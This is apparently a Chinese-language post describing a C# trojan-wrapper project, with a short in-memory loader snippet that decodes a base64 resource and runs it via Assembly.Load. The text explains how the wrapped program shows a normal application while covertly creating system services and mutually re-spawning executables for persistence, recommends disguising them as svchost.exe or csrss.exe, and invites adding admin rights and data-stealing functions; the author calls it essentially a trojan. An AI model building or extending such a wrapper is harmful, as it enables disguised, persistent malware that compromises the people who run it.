此程序仅做参考之用,不要运行里面的exe,否则后果自负。先看里面的说明。
此程序只使用C#编写,功能是将一个正常的程序添加上其他操作。
将一些程序生成字符串,在一个程序里运行,差不多就是在内存里运行程序,
static void Main()
{
string str_Normal = Code_Resource.str_Normal; //取得exe文件生成的base64串
byte[] ns = Convert.FromBase64String(str_Normal); //生成byte[]
Assembly asm_n = Assembly.Load(ns); //运行byte[]
MethodInfo info_n = asm_n.EntryPoint;
ParameterInfo[] parameters_n = info_n.GetParameters();
info_n.Invoke(null, null);
}
这个程序需要执行的代码都在 资源文件 里面。
运行Replica_Prg这个里面的,看到的是Normal_Soft的效果,同时背地里建立多个系统服务、释放多个exe、exe和系统服务相互释放。
因为只使用C#编写,所以只能对.net编写的exe进行转码运行。
可以包装一个常用的.net的exe文件,在里面添加执行其他的.net的exe,差不多就是木马。
此程序只是编译过了,并没有实际运行。
因为要删除这个程序太恶心了,隔几十秒就检测释放,多个系统服务和exe交互释放。
为了便于删除,没检测判断每个服务是否被停掉,重启。
为了便于删除,生成的都在c:\temp里面,生成的可以起个好听的名字,比如svchost.exe、csrss.exe什么的。
有的程序可能忘了添加修改app.manifest(就是管理员模式运行),自行修改,
功能没写,需要执行什么隐私功能自行添加,
有些可能忘写判断了,用try{}没报错,自己添加。
此程序只是编译过了,并没有实际运行检测,可能有些逻辑环节没执行到,或转码重复或有误,自行修正。
程序只是说明性质的,如有兴趣自己去运行、修改。
评论